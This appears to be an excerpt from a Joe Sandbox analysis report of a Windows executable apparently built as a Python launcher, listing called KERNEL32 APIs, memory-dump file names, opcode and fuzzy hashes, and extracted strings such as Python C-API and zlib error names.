                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF7333A0268,?,?,?,00007FF7333A18D2,?,?,?,?,?,00007FF7333A4595), ref: 00007FF7333AE702
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                                                                • Opcode ID: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                                                • Instruction ID: eb237a211b7501945876d854acf0949b0ba12728b6473e4c48d08ae8d3d898d7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4f21c11c5720e62b677d9e99b1ce174dfbed18f849e52640c9a6f6ea7657029
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF08211F1E24261FEF87AA15900275E1905F44772FC8C63CED3EA52E1DE3DE480A230
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C50
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C62
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394C99
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CAB
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CC4
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CD6
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394CEF
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D01
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D1D
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D2F
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D4B
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D5D
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D79
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394D8B
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DA7
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DB9
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DD5
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF73339590F,00000000,00007FF73339272E), ref: 00007FF733394DE7
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                                • Opcode ID: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                                                • Instruction ID: 6c79aa3bbfa05a2952994196b9e47210c65967834f92edfc8d317ae49d8e912e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fe38e706475bc85e8e17d1603b2dd44d209342b91b11e5c33006422c226cfa
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF228F6590EB07B5FAF9FF64B854274B3A0AF48741BC4D43DD40E26264EF3CA589A321
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                                                • Opcode ID: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                                                • Instruction ID: f6efa11b47359d0b46be34a9f2c1045d6c3f9b5e69fd6be887d5022f71649f8c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d700f69ad9a83803b0d0e637264b1b7e22121a30603610bb88393cfb8a3bc4ed
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCB2D172B182829BFBB59F64D4407FDB7A1FB44388F909139DA0D67A85DB3CA900DB50
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                                                • API String ID: 0-2665694366
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: $
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID: e+000$gfff
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                • Instruction ID: fa046f30e8aa03252123918b3797def36ba9f4a8fc6c722e677440b2a6c42ab4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63518232E2865196E7B49F29C04427CB7B0EB45B68F68C139CA5D27BD4CB3AE843D750
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                • Instruction ID: d4f0533f0d83d6dd74aac06cf5fe995997d884e7c6857dcec1fb836db21271d2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF51A432A1865196E7B49B29C050278B3A0EB45B68F64C239DE5D27794CB3EE843E790
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                • Instruction ID: 12f4aa9fd7127bdb50745e2f8766af80bdfe0a557697a8104632833aca2e8d67
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B51E536E1865192E7B49B29C04023CB3A1EB44F69F68D239DE5D27794CF3AE843D790
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                                                • Instruction ID: 6d025b343be698a98b740aa69617040774af0752aaa240e48b495a6df9b0125d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751C236E2865196E7B49B28C040639B7B0EB44F58FA8C139CE5D67794CF3AE843E750
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                                                • Instruction ID: c71a3369f7a5e48a46d7cf79c15a9331e2b34234bf5628d0d64438761335073e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD51E733A18A5196E7B49B28C44077DB7A0EB45F58F648139CE9C277A4CB3EF842E750
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                                                                                • Opcode ID: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                                                • Instruction ID: e0ad2fbae97d26a531db0dc235f5ef6b5e9355c3f42bd3742a7cf338c16eb381
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7ebbd17873febb15e29de35626f23177de76f7dba359f1eda69606ccc1bea3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341E473714A5592EF98DF2AE9141A9B3A1FB48FC0B89D03AEE1DA7B54DE3CD4419300
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                                                • Instruction ID: 6c9ae345e27890028e6aef5faae2eabff10af552603a6be5fbd1e8cac842b008
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4b82ba6feb1f2c625fcdd7b78fc6310e7e433b3778e25011fb45a65c2c329c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B731A732B18B4191E7B4EF26644016DF695AF84BD0F54823CEA6DB3B96DF3CD4016714
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                                                • Instruction ID: df0fb3db21e181a1c7479150052806018e4bf6ecb7979b184a4a206f59f61ab2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47026fad3db46e1691e12129f37de500b9ca6af24d2cbfa86880e77cbf706e66
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDF044726286959AEBE49F2DA44262977E0FB483C0B90C03ED58D83E04D77C90519F14
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                                                • Instruction ID: c99f4640a48e1d2e9c3505d457c6d66c50be3f60a4328b905f79808be2b29379
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0095cffb8fe81db1077c877ec2d194bac0958fa6bcac770c2119ba444bc36b37
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9A0016191C882E0F6A8AB01A961130A260BB51301BC0807AD06D660A09F3CA400A320
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
